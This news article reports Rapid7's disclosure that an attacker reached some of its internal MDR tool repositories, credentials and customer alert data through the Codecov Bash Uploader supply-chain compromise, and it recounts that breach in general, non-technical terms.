Rapid7 Source Code Repositories Compromised Following Codecov Incident
Cybersecurity firm Rapid7 has disclosed that an unauthorized entity gained access to a limited subset of its source code repositories. This revelation follows a recent security breach linked to software auditing tool Codecov, which was compromised earlier this year due to a backdoor incident. The Boston-based organization emphasized that the accessed repositories pertained specifically to internal tools used for its Managed Detection and Response (MDR) service.
In an official statement, Rapid7 confirmed that the unauthorized party accessed repositories containing internal credentials, which have since been rotated, and alert-related data for a select group of its MDR customers. The breach appears to stem from vulnerabilities exploited during the Codecov incident, where attackers infiltrated the software supply chain, allowing them to extract sensitive information.
The Codecov breach, which became public on April 15, revealed that the company’s Bash Uploader utility had been compromised as early as January 31. Attackers utilized a flaw in Codecov’s Docker image creation process to obtain authentication tokens for internal software accounts. These tokens enabled them to manipulate the Uploader script and periodically exfiltrate data stored in users’ continuous integration environments to a third-party server.
Although Rapid7 has stated that there is no evidence suggesting access to other corporate systems or production environments, the potential tactics employed by the attackers align with the MITRE ATT&CK framework. The initial access could have been achieved through supply chain compromise, while persistence might have involved the unauthorized modification of the Bash Uploader script, allowing ongoing data exfiltration. Rapid7’s investigation indicates a focus on the vulnerabilities that facilitated the unauthorized access rather than an overarching compromise of its operational integrity.
As part of its incident response protocol, Rapid7 has reached out to impacted customers, ensuring they are informed about the security breach. The company reiterated that the use of the compromised Uploader script was restricted to a single continuous integration server, used solely for developing internal tools for the MDR service.
This incident places Rapid7 in a growing list of organizations—such as HashiCorp, Confluent, and Twilio—that have publicly acknowledged their involvement in the fallout from the Codecov security breach. Affected Codecov users are advised to reissue all credentials, tokens, or keys in their CI environments that may have been exposed during the specified time frame.
As the cybersecurity landscape continues to evolve, incidents like these serve as a stark reminder for businesses to remain vigilant regarding their security practices and to stay informed about potential vulnerabilities stemming from third-party services. Rapid7’s experience underscores the importance of proactive measures and thorough analyses in safeguarding digital assets against an increasingly sophisticated array of cyber threats.
